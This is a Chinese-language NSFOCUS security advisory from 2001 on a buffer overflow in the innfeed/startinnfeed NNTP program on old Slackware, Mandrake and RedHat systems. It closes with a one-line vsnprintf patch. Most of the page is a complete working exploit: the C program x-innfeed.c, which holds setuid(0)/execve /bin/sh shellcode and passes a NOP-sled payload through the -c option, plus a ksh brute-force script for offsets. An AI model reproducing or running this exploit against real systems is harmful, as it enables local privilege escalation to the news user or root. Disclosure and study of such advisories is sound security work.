首页 -> 安全研究
安全研究
安全漏洞
innfeed 缓冲区溢出漏洞
发布日期:2001-04-24
更新日期:2001-04-24
受影响系统:
描述:
Slackware 7.1 及更老的版本
Mandrake 7.0 及更老的版本
RedHat 7.2 及更老的版本
innfeed 程序是 NNTP 协议的一个实现。NNTP 是用来在计算机间传递新闻的协议。
由于没有作边界检查,在使用 -c 选项时发生缓冲区溢出。这使得可以完全控制堆栈,
并且把用户 ID 和组 ID 改为新闻组的用户 ID 和组 ID。
具体说来,溢出发生在程序里的 logOrPrint() 函数调用 logOrPrintf()时。由于
这个溢出,攻击者能够加入木马代码获取进一步的访问权,以此来提升权限,把自己
的用户 ID 和组 ID 改为新闻组的用户 ID 和组 ID。这样就对归新闻组所有的文件
得到拥有权限了,并且在某些情况下能够把文件换成木马。如果 root运行这些程序,
可能就要受到侵害了。
<* 来源:Enrique A. Sanchez Montellano
Alex Hernandez (alex.hernandez@defcom.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
--- x-innfeed.c ---
/*
x-innfeed.c
Buffer overflow in innfeed being called from startinnfeed
renders uid(news) gid(news), startinnfeed is suid root so
I have to also check if I can manage to get root out of
this ....
Enrique A. Sanchez Montellano
(@defcom.com ... Yes is only @defcom.com)
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 0
#define ALIGN 0
#define BUFFER 470
// MANDRAKE, REDHAT, etc....
#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
file://static char shellcode[]=
file://"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
file://"\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#endif
#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[] =
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0"
"\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
void usage(char *name)
{
printf("Usage: %s <offset> <align> <buffer>\n", name);
printf("Defcom Labs @ Spain ...\n");
printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
exit(0);
}
int main(int argc, char **argv)
{
char *code;
int offset = OFFSET;
int align = ALIGN;
int buffer = BUFFER;
unsigned long addr;
int i;
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffer = atoi(argv[3]);
code = (char *)malloc(buffer);
printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
printf("------------------------------------------------------------\n");
printf("[ + ] Found by: \n\n[ + ] Alex Hernandez"
"(alex.hernandez@defcom.com)\n"
"[ + ] Enrique Sanchez (@defcom.com ... "
"Yes is just @defcom.com)\n");
printf("[ + ] Defcom Labs @ Spain ....\n");
printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");
addr = get_sp() - offset;
printf("[ + ] Using address 0x%x\n", addr);
for (i = 0; i <= buffer; i += 4) {
*(long *)&code[i] = 0x90909090;
}
*(long *)&code[buffer - 4] = addr;
*(long *)&code[buffer - 8] = addr;
memcpy(code + buffer - strlen(shellcode) - 8 - align,
shellcode, strlen(shellcode));
printf("[ + ] Starting exploitation ... \n\n");
// REDHAT, MANDRAKE ...
#ifdef REDHAT
execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif
// SLACKWARE
#ifdef SLACKWARE
execl("/usr/lib/news/bin/startinnfeed",
"/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif
return 0;
}
--- x-innfeed.c ---
--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 1`
../x-startinnfeed $L
done
--- brute.sh ---
建议:
临时解决办法:
NSFOCUS建议您不要以 root 身份运行 innfeed,这样至少
可以减少一些风险。另外,漏洞发现者提供如下的补丁:
---innfeed-overflow.patch---
210c210
< vsprintf (buffer,fmt,ap);
---
> vsnprintf (buffer,512,fmt,ap);
---innfeed-overflow.patch---
厂商补丁:
建议您升级到 2.3.1,该版本中不再有这个漏洞。
浏览次数:3465
严重程度:0(网友投票)
绿盟科技给您安全的保障